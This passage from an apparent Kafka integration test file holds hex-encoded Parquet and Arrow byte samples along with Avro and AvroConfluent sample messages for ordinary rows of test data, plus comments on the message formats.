\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\
x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
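# A hedged note on the AvroConfluent samples above: the Confluent wire format is
# assumed to be a single 0x00 magic byte, a 4-byte big-endian schema id obtained
# from the schema registry, and then the Avro-encoded row(s); this is why
# avro_confluent_message() needs the schema_registry_client and why the table
# needs format_avro_schema_registry_url to decode the payload.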
'Avro': {
# It seems impossible to send more than one Avro file per message,
# because of the nature of Avro: blocks follow one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
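# Note (added clarification): while only one Avro file fits into a message, one
# file may contain many rows, so the second sample above packs ids 1..15 into a
# single Kafka message; that is why those rows later share a single _offset in
# the expected results of this test.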
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\
x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00